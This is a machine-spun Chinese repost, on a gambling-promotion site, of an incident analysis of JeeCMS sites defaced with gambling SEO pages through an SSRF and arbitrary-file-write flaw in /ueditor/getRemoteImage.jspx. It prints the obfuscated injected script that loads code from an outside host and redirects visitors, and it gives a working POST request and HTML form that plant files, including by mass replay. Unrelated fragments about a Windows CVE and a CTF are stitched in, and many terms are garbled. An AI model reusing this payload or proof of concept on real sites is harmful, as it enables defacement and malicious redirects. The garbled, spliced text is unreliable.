JeeCMS破绽竟沦为黑产SEO的秘密武器? | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

JeeCMS破绽竟沦为黑产SEO的秘密武器?

申博_安全工具 申博 268次浏览 未收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

配景概述

近日深佩服平安感知平台发明客户服务器中的文件被改动,植入博彩页面。经深佩服平安团队排查,发明大批网页文件被改动,且被改动的时候异常麋集,以下图所示在2019年3月26日 16:46摆布网站目次下发生大批歹意文件。

入侵剖析

排查改动目次下最早被改动的文件,建立时候为2019年3月14日13:53。

排查被改动的网站文件,均在头部地位发明了歹意代码,以下图所示:

歹意代码内容以下:

<script>var _0x150a=[“\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x61\x74\x61\x70\x69\x38\x38\x38\x2E\x63\x6F\x6D\x2F\x67\x6C\x6F\x62\x61\x6C\x2F\x73\x74\x61\x74\x69\x63\x2F\x6A\x73\x2F\x74\x2E\x70\x68\x70\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65″];document[_0x150a[1]](_0x150a[0]);</script>
经hex转换解码后发明是一段歹意js剧本,即经由过程document.write写入歹意链接http://atapi888.com/global/static/js/t.php,js内容以下图所示:

经由过程浏览器接见http://atapi888.com/global/static/js/t.php后,发明返回内容一样为编码后的内容,以下图所示:

检察源码,发明此处另有一个博彩流量统计网站http://count.51yes.com/。

将以上编码的内容hex转换解码后获得以下图所示网址,即经由过程windows.location.href翻开新窗口https://www.1851147.com。

接见https://www.1851147.com页面,发明是博彩站。

CVE-2019-0841:Windows DACL权限覆写权限提升漏洞

该漏洞允许低权限的用户通过覆写目标文件的权限来劫持属于NT AUTHORITY\SYSTEM的文件。成功利用就可以使低权限的用户获得对目标文件的完全控制权限。 所有的Windows APP都有一个settings.dat文件用来记录APP的注册表设置。该文件是一个可

查杀网站中的webshell后门,没有发明任何webshell网页木马,以下图所示:

依据黑链写入的时候点,排查web日记,发明异常POST要求的时候和文件被改动的时候点均一致,由此能够得知破绽一定出在/ueditor/getRemoteImage.jspx接口中。

破绽剖析

从web日记中能够发明在某个流动时候点,进击者发送了大批POST数据包,目的的URL为:http://域名/ueditor/getRemoteImage.jspx,排除webshell后门存在的可能性,也就说getRemoteImage.jspx该接口一定存在破绽。源码中寻觅getRemoteImage.jspx文件,服务器上未发明该文件了。尝试用内容婚配的体式格局去寻觅存在题目的class组件。这里运用everything的content文件内容婚配功用查找相干接口EeditorAct.class,具体方法以下图所示:

对UeditorAct.class文件举行反编译,剖析/ueditor/getRemoteImage.jspx接口,该接口的主要功用是读取长途服务器上的资本而且未对资本的范例或许后缀举行推断并直接将其写入到/u/cms/www/目次下。此处一样存在SSRF破绽,也就是说经由过程该接口能够探测内网、接见公网,又因为此处存在了恣意文件写入才致使了黑页的写入。

JeeCMS破绽竟沦为黑产SEO的秘密武器?

破绽伤害

长途进击者可借助upfile参数应用服务器端要求捏造破绽破绽猎取敏感信息,进击内部收集主机或写入歹意文件。
破绽复现
测试机械IP:192.168.231.133 装置jeecms v7版本
模仿长途主机IP:192.168.231.134
当地装置jeecms v7版本,运转情况须要JDK5+TOMCAT5.5+MYSQL5及以上版本,为了复现长途文件读取并到达预期的结果,在长途主机192.168.231.134根目次下写入测试文件test.html。抓取接见数据包,并将其转化为上传花样,数据包转换地点:http://ld8.me/multipart.php
转换以后服务器端发送的数据包以下:

POST /ueditor/getRemoteImage.jspx HTTP/1.1
Host: 192.168.231.133:8080
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2188.2 Safari/537.36
Content-Type: multipart/form-data; boundary=--------WebKitFormBoundaryYJmKM8kHUlKMIlvC
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=A8872FC0A3E148E7A262F1A3D31B8FF9; _site_id_cookie=1; clientlanguage=zh_CN


----------WebKitFormBoundaryYJmKM8kHUlKMIlvC
Content-Disposition: form-data; name="upfile"

http://192.168.231.134/test.html
----------WebKitFormBoundaryYJmKM8kHUlKMIlvC--

因为代码端上传的时候直接是用参数upfile,为了轻易组织数据包也能够直接组织一个表单来完成此次的操纵。表单组织内容以下图所示:

<form action="http://192.168.231.133:8080/ueditor/getRemoteImage.jspx" method="post" enctype="multipart/form-data">
<input name="upfile" value="ue_separate_ue">
<input type="submit">
</form>

表单提交操纵以下:

模仿植入博彩页面结果
经由过程burpsiut重放数据包,201904目次下天生09124849fdab.html,胜利抓取192.168.231.134上的test.html文件。

模仿批量植入博彩页面结果
设置fiddler中的replay的request值为20,点击replay批量发包,短时候内植入20个歹意HTML页面,能够发明在201904目次下同一时候内天生大批的歹意html页面。

防备计划

1、经由过程深佩服下一代防火墙临时限定对/ueditor/getRemoteImage.jspx接口的接见。
2、晋级JeeCMS到最新版本。

Hackerone 50m-ctf writeup(第一部分)

总结: 有关挑战的简要概述,您可以查看以下图像: 下面我将详细介绍我为解决CTF而采取的每一步,以及在某些情况下导致我走向死胡同的所有错误假设。 Twitter CTF从这条tweet开始: 这些二进制是什么? 我的第一个想法是尝试解码图像上的


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明JeeCMS破绽竟沦为黑产SEO的秘密武器?
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址